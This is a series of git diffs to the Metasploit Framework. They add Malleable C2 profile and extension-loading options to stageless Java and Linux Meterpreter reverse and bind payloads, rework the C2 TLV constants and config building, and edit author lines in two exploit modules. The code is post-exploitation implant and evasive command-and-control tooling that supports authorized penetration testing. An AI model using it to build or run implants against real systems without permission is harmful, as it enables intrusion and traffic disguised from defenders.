--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -87,8 +87,12 @@ private
       c2_tlv = profile.to_tlv
     else
       c2_tlv = MET::GroupTlv.new(MET::TLV_TYPE_C2)
+    end
 
-      c2_tlv.add_tlv(MET::TLV_TYPE_C2_UA, opts[:ua]) unless (opts[:ua] || '').empty?
+    # Fall back to the datastore UA when the profile didn't `set useragent`
+    # (or there's no profile at all).
+    unless (opts[:ua] || '').empty? || c2_tlv.tlvs.any? { |t| t.type == MET::TLV_TYPE_C2_UA }
+      c2_tlv.add_tlv(MET::TLV_TYPE_C2_UA, opts[:ua])
     end
 
     c2_tlv.add_tlv(MET::TLV_TYPE_C2_COMM_TIMEOUT, opts[:comm_timeout])

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -129,12 +129,23 @@ private
 
   def add_extension_tlv(tlv, ext_name, ext_init_path, file_extension, debug_build: false)
     ext_name = ext_name.strip.downcase
-    # Windows DLLs go through Reflective DLL Injection prep; non-PE
-    # runtimes (jar/py/php) ship the file as-is in TLV_TYPE_DATA.
-    if file_extension.to_s.end_with?('.dll')
+    # Windows DLLs go through Reflective DLL Injection prep; mettle bins
+    # come per-platform from the mettle gem; jar/py/php ship as-is.
+    case file_extension.to_s
+    when /\.dll$/
       ext_path = MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
                                                      file_extension, debug: debug_build)
       ext, _ = load_rdi_dll(ext_path)
+    when 'bin'
+      begin
+        ext = MetasploitPayloads::Mettle.load_extension(@opts[:mettle_platform], ext_name, 'bin')
+      rescue MetasploitPayloads::Mettle::NotFoundError
+        # Mettle bakes some extensions (e.g. stdapi) directly into the
+        # binary, so there's no separate <name>.bin to ship. Silently
+        # skip and let the runtime use whatever's already registered.
+        $stderr.puts("[!] EXTENSIONS=#{ext_name}: no separate '#{ext_name}.bin' for #{@opts[:mettle_platform]} (already built in?), skipping")
+        return
+      end
     else
       ext = MetasploitPayloads.read('meterpreter', "ext_server_#{ext_name}.#{file_extension}".downcase)
     end

--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -121,16 +121,6 @@ private
 
         c2_tlv.add_tlv(MET::TLV_TYPE_C2_CERT_HASH, opts[:ssl_cert_hash]) unless (opts[:ssl_cert_hash] || '').empty?
         c2_tlv.add_tlv(MET::TLV_TYPE_C2_HEADERS, opts[:custom_headers]) unless (opts[:custom_headers] || '').empty?
-
-        # Per-transport UUID for C2 profile placement (uuid_get/header/cookie).
-        # Payloads fall back to URL-path extraction when this TLV is absent.
-        # Bake a checksum-tuned :init_connect URI (>=URI_CHECKSUM_UUID_MIN_LEN,
-        # checksum8 => mode), not the bare to_uri. The handler needs the tuned
-        # form to extract both the UUID and the mode; a bare UUID yields nil.
-        if @opts[:uuid]
-          tuned = generate_uri_uuid(URI_CHECKSUM_INIT_CONN, @opts[:uuid]).sub(%r{\A/}, '')
-          c2_tlv.add_tlv(MET::TLV_TYPE_C2_UUID, tuned)
-        end
       end
     end
 

--- a/lib/rex/payloads/meterpreter/uri_checksum.rb
+++ b/lib/rex/payloads/meterpreter/uri_checksum.rb
@@ -13,6 +13,7 @@ module Rex
         URI_CHECKSUM_INITN      = 92 # Native (same as Windows)
         URI_CHECKSUM_INITP      = 80 # Python
         URI_CHECKSUM_INITJ      = 88 # Java
+        URI_CHECKSUM_INITPH     = 84 # PHP
         URI_CHECKSUM_CONN       = 98 # Existing session
         URI_CHECKSUM_INIT_CONN  = 95 # New stageless session
 
@@ -21,6 +22,7 @@ module Rex
           URI_CHECKSUM_INITN,      :init_native,
           URI_CHECKSUM_INITP,      :init_python,
           URI_CHECKSUM_INITJ,      :init_java,
+          URI_CHECKSUM_INITPH,     :init_php,
           URI_CHECKSUM_INIT_CONN,  :init_connect,
           URI_CHECKSUM_CONN,       :connect
         ]

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -151,7 +151,7 @@ class ClientCore < Extension
 
     response.each(TLV_TYPE_C2) { |t|
       # TODO: Consider adding more information to the output for malleable profiles?
-      # TLV_TYPE_C2_GET, TLV_TYPE_C2_POST, TLV_TYPE_C2_PREFIX, TLV_TYPE_C2_SUFFIX, TLV_TYPE_C2_ENC,
+      # TLV_TYPE_C2_GET, TLV_TYPE_C2_POST, TLV_TYPE_C2_PREFIX, TLV_TYPE_C2_SUFFIX, TLV_TYPE_C2_ENC_INBOUND, TLV_TYPE_C2_ENC_OUTBOUND,
       # TLV_TYPE_C2_PREFIX_SKIP, TLV_TYPE_C2_SUFFIX_SKIP,
       # TLV_TYPE_C2_UUID_COOKIE, TLV_TYPE_C2_UUID_GET, TLV_TYPE_C2_UUID_HEADER
       # Not sure if this stuff is useful for this display though.

--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -10,6 +10,9 @@ require 'rex/post/meterpreter/client'
 # certificate hash checking
 require 'rex/socket/x509_certificate'
 
+# parsing of Malleable C2 profiles for transport_add / transport_change
+require 'msf/core/payload/malleable_c2'
+
 require 'openssl'
 
 module Rex
@@ -149,7 +152,8 @@ class ClientCore < Extension
     response.each(TLV_TYPE_C2) { |t|
       # TODO: Consider adding more information to the output for malleable profiles?
       # TLV_TYPE_C2_GET, TLV_TYPE_C2_POST, TLV_TYPE_C2_PREFIX, TLV_TYPE_C2_SUFFIX, TLV_TYPE_C2_ENC,
-      # TLV_TYPE_C2_SKIP_COUNT, TLV_TYPE_C2_UUID_COOKIE, TLV_TYPE_C2_UUID_GET, TLV_TYPE_C2_UUID_HEADER
+      # TLV_TYPE_C2_PREFIX_SKIP, TLV_TYPE_C2_SUFFIX_SKIP,
+      # TLV_TYPE_C2_UUID_COOKIE, TLV_TYPE_C2_UUID_GET, TLV_TYPE_C2_UUID_HEADER
       # Not sure if this stuff is useful for this display though.
       result[:transports] << {
         :url            => t.get_tlv_value(TLV_TYPE_C2_URL),
@@ -904,7 +908,17 @@ private
       end
     end
 
-    c2_tlv = GroupTlv.new(TLV_TYPE_C2)
+    # When a Malleable C2 profile is supplied, start from its TLV (which carries
+    # UA + GET/POST sub-groups) and layer the rest on top; otherwise build a
+    # bare C2 group.
+    if (opts[:c2_profile] || '').empty?
+      c2_tlv = GroupTlv.new(TLV_TYPE_C2)
+      has_profile = false
+    else
+      profile = Msf::Payload::MalleableC2::Parser.new.parse(opts[:c2_profile])
+      c2_tlv = profile.to_tlv
+      has_profile = true
+    end
 
     if opts[:comm_timeout]
       c2_tlv.add_tlv(TLV_TYPE_C2_COMM_TIMEOUT, opts[:comm_timeout])
@@ -929,8 +943,11 @@ private
         url << generate_uri_uuid(sum, opts[:uuid]) + '/'
       end
 
-      opts[:ua] ||= Rex::UserAgent.random
-      c2_tlv.add_tlv(TLV_TYPE_C2_UA, opts[:ua])
+      # When a profile is supplied it controls the UA; otherwise add a default.
+      unless has_profile
+        opts[:ua] ||= Rex::UserAgent.random
+        c2_tlv.add_tlv(TLV_TYPE_C2_UA, opts[:ua])
+      end
 
       if transport == 'reverse_https' && opts[:cert] # currently only https transport offers ssl
         hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])

--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -139,7 +139,10 @@ TLV_TYPE_C2_UUID_GET           = TLV_META_TYPE_STRING | 724 # Name of the GET pa
 TLV_TYPE_C2_UUID_HEADER        = TLV_META_TYPE_STRING | 725 # Name of the header to put the UUID in
 TLV_TYPE_C2_UUID               = TLV_META_TYPE_STRING | 726 # string representation of the UUID for C2s
 TLV_TYPE_SESSION_FLAGS         = TLV_META_TYPE_UINT   | 727 # session-level config flags (e.g. FLAG_STAGELESS, FLAG_DEBUG)
-TLV_TYPE_C2_ENC_OUTBOUND       = TLV_META_TYPE_UINT   | 728 # Server-outbound (server->client) body encoding
+TLV_TYPE_C2_ENC_OUTBOUND       = TLV_META_TYPE_UINT   | 728 # Client->server (request) body encoding (POST only)
+TLV_TYPE_C2_ENC_UUID           = TLV_META_TYPE_UINT   | 729 # Encoding applied to the UUID before placement (URL/header/cookie)
+TLV_TYPE_C2_UUID_PREFIX        = TLV_META_TYPE_RAW    | 730 # Bytes to prepend to the encoded UUID
+TLV_TYPE_C2_UUID_SUFFIX        = TLV_META_TYPE_RAW    | 731 # Bytes to append to the encoded UUID
 
 #
 # C2 Encoding flags

--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -141,8 +141,8 @@ TLV_TYPE_C2_UUID               = TLV_META_TYPE_STRING | 726 # string representat
 TLV_TYPE_SESSION_FLAGS         = TLV_META_TYPE_UINT   | 727 # session-level config flags (e.g. FLAG_STAGELESS, FLAG_DEBUG)
 TLV_TYPE_C2_ENC_OUTBOUND       = TLV_META_TYPE_UINT   | 728 # Client->server (request) body encoding (POST only)
 TLV_TYPE_C2_ENC_UUID           = TLV_META_TYPE_UINT   | 729 # Encoding applied to the UUID before placement (URL/header/cookie)
-TLV_TYPE_C2_UUID_PREFIX        = TLV_META_TYPE_RAW    | 730 # Bytes to prepend to the encoded UUID
-TLV_TYPE_C2_UUID_SUFFIX        = TLV_META_TYPE_RAW    | 731 # Bytes to append to the encoded UUID
+TLV_TYPE_C2_UUID_PREFIX        = TLV_META_TYPE_STRING | 730 # String to prepend to the encoded UUID
+TLV_TYPE_C2_UUID_SUFFIX        = TLV_META_TYPE_STRING | 731 # String to append to the encoded UUID
 
 #
 # C2 Encoding flags

--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -138,6 +138,7 @@ TLV_TYPE_C2_UUID_COOKIE        = TLV_META_TYPE_STRING | 723 # Name of the cookie
 TLV_TYPE_C2_UUID_GET           = TLV_META_TYPE_STRING | 724 # Name of the GET parameter to put the UUID in
 TLV_TYPE_C2_UUID_HEADER        = TLV_META_TYPE_STRING | 725 # Name of the header to put the UUID in
 TLV_TYPE_C2_UUID               = TLV_META_TYPE_STRING | 726 # string representation of the UUID for C2s
+TLV_TYPE_SESSION_FLAGS         = TLV_META_TYPE_UINT   | 727 # session-level config flags (e.g. FLAG_STAGELESS, FLAG_DEBUG)
 
 #
 # C2 Encoding flags

--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -131,7 +131,7 @@ TLV_TYPE_C2_UA                 = TLV_META_TYPE_STRING | 716 # User agent
 TLV_TYPE_C2_CERT_HASH          = TLV_META_TYPE_RAW    | 717 # Expected SSL certificate hash
 TLV_TYPE_C2_PREFIX             = TLV_META_TYPE_RAW    | 718 # Data to prepend to the outgoing payload
 TLV_TYPE_C2_SUFFIX             = TLV_META_TYPE_RAW    | 719 # Data to append to the outgoing payload
-TLV_TYPE_C2_ENC                = TLV_META_TYPE_UINT   | 720 # Request encoding flags (Base64|URL|Base64url)
+TLV_TYPE_C2_ENC_INBOUND        = TLV_META_TYPE_UINT   | 720 # Server-inbound (client->server) body/metadata encoding
 TLV_TYPE_C2_PREFIX_SKIP        = TLV_META_TYPE_UINT   | 721 # Size of prefix to skip (in bytes)
 TLV_TYPE_C2_SUFFIX_SKIP        = TLV_META_TYPE_UINT   | 722 # Size of suffix to skip (in bytes)
 TLV_TYPE_C2_UUID_COOKIE        = TLV_META_TYPE_STRING | 723 # Name of the cookie to put the UUID in
@@ -139,6 +139,7 @@ TLV_TYPE_C2_UUID_GET           = TLV_META_TYPE_STRING | 724 # Name of the GET pa
 TLV_TYPE_C2_UUID_HEADER        = TLV_META_TYPE_STRING | 725 # Name of the header to put the UUID in
 TLV_TYPE_C2_UUID               = TLV_META_TYPE_STRING | 726 # string representation of the UUID for C2s
 TLV_TYPE_SESSION_FLAGS         = TLV_META_TYPE_UINT   | 727 # session-level config flags (e.g. FLAG_STAGELESS, FLAG_DEBUG)
+TLV_TYPE_C2_ENC_OUTBOUND       = TLV_META_TYPE_UINT   | 728 # Server-outbound (server->client) body encoding
 
 #
 # C2 Encoding flags

--- a/lib/rex/proto/http/server.rb
+++ b/lib/rex/proto/http/server.rb
@@ -292,7 +292,10 @@ protected
       root = request.resource
     elsif resources[request.resource]
       p = resources[request.resource]
-      len = resource_id.length
+      # This branch is reached when resource_id is nil (e.g. fetch-payload
+      # adapters have no find_resource_id), so the matched resource is the
+      # request resource itself — not resource_id, which would nil-deref.
+      len = request.resource.length
       root = request.resource
     else
       # Search for the resource handler for the requested URL.  This is pretty

--- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This module has been tested on the STBN300 device.
         },
         'Author' => [
-          'OJ Reeves <oj[at]beyondbinary.io>' # Discovery and Metasploit module
+          'OJ Reeves' # Discovery and Metasploit module
         ],
         'References' => [
           ['CVE', '2014-8684'],

--- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
+++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
@@ -84,9 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
           pool base in kernel memory and set it as the GROOMBASE option.
         },
         'Author' => [
-          'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 - Original exploit
+          'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
           'Ryan Hanson',                              # @ryHanson - Original exploit
-          'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
+          'OJ Reeves',                                # @TheColonial - Metasploit module
           'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
         ],
         'License' => MSF_LICENSE,

--- a/modules/payloads/singles/java/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_bind_tcp.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Java::BindTcp
+  include Msf::Payload::Java::MeterpreterLoader
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Java Meterpreter, Bind TCP Stageless',
+        'Description' => 'Run a meterpreter server in Java. Bind TCP. Self-contained jar.',
+        'Author' => ['mihi', 'egypt', 'OJ Reeves'],
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Handler' => Msf::Handler::BindTcp,
+        'License' => MSF_LICENSE,
+        'Session' => Msf::Sessions::Meterpreter_Java_Java
+      )
+    )
+  end
+
+  def generate(opts = {})
+    stage_meterpreter(opts.merge(stageless: true))
+  end
+end

--- a/modules/payloads/singles/java/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_bind_tcp.rb
@@ -26,7 +26,7 @@ module MetasploitModule
     )
   end
 
-  def generate(opts = {})
-    stage_meterpreter(opts.merge(stageless: true))
+  def generate_jar(opts = {})
+    super(opts.merge(stageless: true))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_bind_tcp.rb
@@ -24,9 +24,13 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Java_Java
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate_jar(opts = {})
-    super(opts.merge(stageless: true))
+    super(opts.merge(stageless: true, extensions: (datastore['EXTENSIONS'] || '').split(',')))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_http.rb
@@ -24,9 +24,13 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Java_Java
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
-  def generate(opts = {})
-    stage_meterpreter(opts.merge(stageless: true))
+  def generate_jar(opts = {})
+    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2']))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_http.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Java::ReverseHttp
+  include Msf::Payload::Java::MeterpreterLoader
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Java Meterpreter, Reverse HTTP Stageless',
+        'Description' => 'Run a meterpreter server in Java. Reverse HTTP. Self-contained jar.',
+        'Author' => ['mihi', 'egypt', 'OJ Reeves'],
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Handler' => Msf::Handler::ReverseHttp,
+        'License' => MSF_LICENSE,
+        'Session' => Msf::Sessions::Meterpreter_Java_Java
+      )
+    )
+  end
+
+  def generate(opts = {})
+    stage_meterpreter(opts.merge(stageless: true))
+  end
+end

--- a/modules/payloads/singles/java/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_http.rb
@@ -27,10 +27,11 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
   def generate_jar(opts = {})
-    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2']))
+    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2'], extensions: (datastore['EXTENSIONS'] || '').split(',')))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_https.rb
@@ -24,9 +24,13 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Java_Java
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+    ])
   end
 
-  def generate(opts = {})
-    stage_meterpreter(opts.merge(stageless: true))
+  def generate_jar(opts = {})
+    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2']))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_https.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Java::ReverseHttps
+  include Msf::Payload::Java::MeterpreterLoader
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Java Meterpreter, Reverse HTTPS Stageless',
+        'Description' => 'Run a meterpreter server in Java. Reverse HTTPS. Self-contained jar.',
+        'Author' => ['mihi', 'egypt', 'OJ Reeves'],
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Handler' => Msf::Handler::ReverseHttps,
+        'License' => MSF_LICENSE,
+        'Session' => Msf::Sessions::Meterpreter_Java_Java
+      )
+    )
+  end
+
+  def generate(opts = {})
+    stage_meterpreter(opts.merge(stageless: true))
+  end
+end

--- a/modules/payloads/singles/java/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_https.rb
@@ -27,10 +27,11 @@ module MetasploitModule
 
     register_options([
       OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
     ])
   end
 
   def generate_jar(opts = {})
-    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2']))
+    super(opts.merge(stageless: true, c2_profile: datastore['MALLEABLEC2'], extensions: (datastore['EXTENSIONS'] || '').split(',')))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
@@ -1,0 +1,32 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = :dynamic
+
+  include Msf::Payload::Single
+  include Msf::Payload::Java::ReverseTcp
+  include Msf::Payload::Java::MeterpreterLoader
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Java Meterpreter, Reverse TCP Stageless',
+        'Description' => 'Run a meterpreter server in Java. Reverse TCP. Self-contained jar.',
+        'Author' => ['mihi', 'egypt', 'OJ Reeves'],
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'License' => MSF_LICENSE,
+        'Session' => Msf::Sessions::Meterpreter_Java_Java
+      )
+    )
+  end
+
+  def generate(opts = {})
+    stage_meterpreter(opts.merge(stageless: true))
+  end
+end

--- a/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
@@ -26,7 +26,7 @@ module MetasploitModule
     )
   end
 
-  def generate(opts = {})
-    stage_meterpreter(opts.merge(stageless: true))
+  def generate_jar(opts = {})
+    super(opts.merge(stageless: true))
   end
 end

--- a/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/java/meterpreter_reverse_tcp.rb
@@ -24,9 +24,13 @@ module MetasploitModule
         'Session' => Msf::Sessions::Meterpreter_Java_Java
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate_jar(opts = {})
-    super(opts.merge(stageless: true))
+    super(opts.merge(stageless: true, extensions: (datastore['EXTENSIONS'] || '').split(',')))
   end
 end

--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_aarch64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'aarch64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_aarch64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'aarch64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_aarch64_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'aarch64-linux-musl',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
@@ -31,11 +31,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5b-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -31,11 +31,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5b-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -31,11 +31,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armbe_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5b-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armle_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5l-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armle_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'https',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5l-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -32,11 +32,17 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_armle_Linux
       )
     )
+
+    register_options([
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'tcp',
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'armv5l-linux-musleabi',
       stageless: true
     }.merge(mettle_logging_config)
     payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec

--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -32,11 +32,19 @@ module MetasploitModule
         'Session'       => Msf::Sessions::Meterpreter_mips64_Linux
       )
     )
+
+    register_options([
+      OptString.new('MALLEABLEC2', [false, 'Path to a file containing the malleable C2 profile']),
+      OptString.new('EXTENSIONS', [false, 'Comma-separate list of extensions to load'])
+    ])
   end
 
   def generate(_opts = {})
     opts = {
       scheme: 'http',
+      c2_profile: datastore['MALLEABLEC2'],
+      extensions: (datastore['EXTENSIONS'] || '').split(','),
+      mettle_platform: 'mips64-linux-muslsf',
       stageless: true
     }.merge(mettle_logging_config)
